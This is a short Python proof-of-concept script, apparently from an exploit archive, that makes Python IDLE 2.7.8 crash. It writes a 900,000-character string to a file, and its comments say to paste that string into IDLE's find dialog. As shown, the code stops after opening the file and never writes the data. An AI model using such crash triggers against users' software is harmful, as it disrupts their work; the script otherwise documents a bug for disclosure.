#!/usr/bin/env python
# Title : Python IDLE 2.7.8 - Crash Proof Of Concept
# Website : http://www.python.org/idle/
# Tested : Windows 7 / Windows 8.1
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
# 1 . run python code : python poc.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "python 2.7.8 IDLE"
# 4 . from Menu (edit --> find)
# 5 . Paste ClipBoard on "find"
# 6 . Enter
# 7 . Crashed ;)
crash = "\x41"*900000 #B0F
file = open("r3z4.txt", "w")